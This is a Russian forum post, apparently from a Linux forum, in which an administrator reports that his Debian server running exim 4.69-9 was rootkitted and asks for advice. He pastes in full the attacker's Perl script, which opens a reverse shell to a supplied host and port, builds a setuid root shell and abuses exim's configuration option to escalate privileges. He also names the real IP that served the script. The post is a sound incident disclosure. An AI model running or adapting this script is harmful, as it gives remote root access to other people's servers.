Походу в exim 4.69-9 кроется уязвимость, система была поставлена неделю назад и настроена, сегодня неприятно заметил что на сервере подменены основные утилиты (ls, ps, find и прочие)
ii exim4 4.69-9 metapackage to ease Exim MTA (v4) installation
ii exim4-base 4.69-9 support files for all Exim MTA (v4) packages
ii exim4-config 4.69-9 configuration for the Exim MTA (v4)
ii exim4-daemon-heavy 4.69-9 Exim MTA (v4) daemon with extended features, including exiscan
rc exim4-daemon-light 4.69-9 lightweight Exim MTA (v4) daemon
lsattr показал неприятные штучки:
s---ia------------- /bin/netstat
s---ia------------- /bin/ps
s---ia------------- /bin/ls
s---ia------------- /usr/bin/top
s---ia------------- /usr/bin/pstree
s---ia------------- /usr/bin/md5sum
s---ia------------- /usr/bin/find
похоже на какой-то руткит вдобавок. Будьте осторожны! В процессах нашел ttymon tymon (использовал htop, так как ни top, ни ps его не показывают, ибо хакнуты)
файлы принадлежат 501 юзеру, которого не существует в системе..
в /tmp/ обнаружился c.pl с содержимым:
$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
print «Usage: $0 [Host] [Port] \n\n»;
die «Ex: $0 127.0.0.1 2121 \n»;
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print «[-] Unable to Resolve Host\n»;
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print «[-] Unable to Connect Host\n»;
SOCKET->autoflush();
open(STDIN, «>&SOCKET»);
open(STDOUT,«>&SOCKET»);
open(STDERR,«>&SOCKET»);
open FILE, «>/var/spool/exim4/s.c»;
print FILE qq{
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl(«/bin/sh», «sh», NULL);
}
};
close FILE;
system(«gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c»);
open FILE, «>/tmp/e.conf»;
print FILE «spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}»;
close FILE;
system(«exim -C/tmp/e.conf -q; rm /tmp/e.conf»);
system(«uname -a;»);
system(«/var/spool/exim4/s»);
system($system);
в rejectlog нашел письмо с линками на http://217.27.255.4/test.txt там собственно этот файл и есть.
сам сервер свежак, настроен только exim + dovecot + roundcube к ним, стоит mysql и apache2, больше на нем нету ничего. Все ставилось из репозиториев + php-fileinfo и php-чего-тоеще собирались через pear (зависимости раундкьюба). Судя по реджекту - вошли через exim, хистори пусты, так что если кто был, уже не узнать, вычищено.
сервер от сети отрубил, конфиги сохранил, теперь вот в размышлениях что ставить. Кто-нибудь про эту уязвимость в курсе? пофиксена она в SID или testing? Дебиан люблю и всю жизнь с ним, не хотелось бы расставаться, да и уязвимые exim'ы запросто могут оказаться и на других дистрибутивах.
Что можете посоветовать?
Ответ на:
комментарий
от BaBL
Ответ на:
комментарий
от BaBL
Ответ на:
комментарий
от anonymous
Ответ на:
комментарий
от BaBL
Ответ на:
комментарий
от elipse
Ответ на:
комментарий
от BaBL
Ответ на:
комментарий
от elipse
Ответ на:
комментарий
от BaBL
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.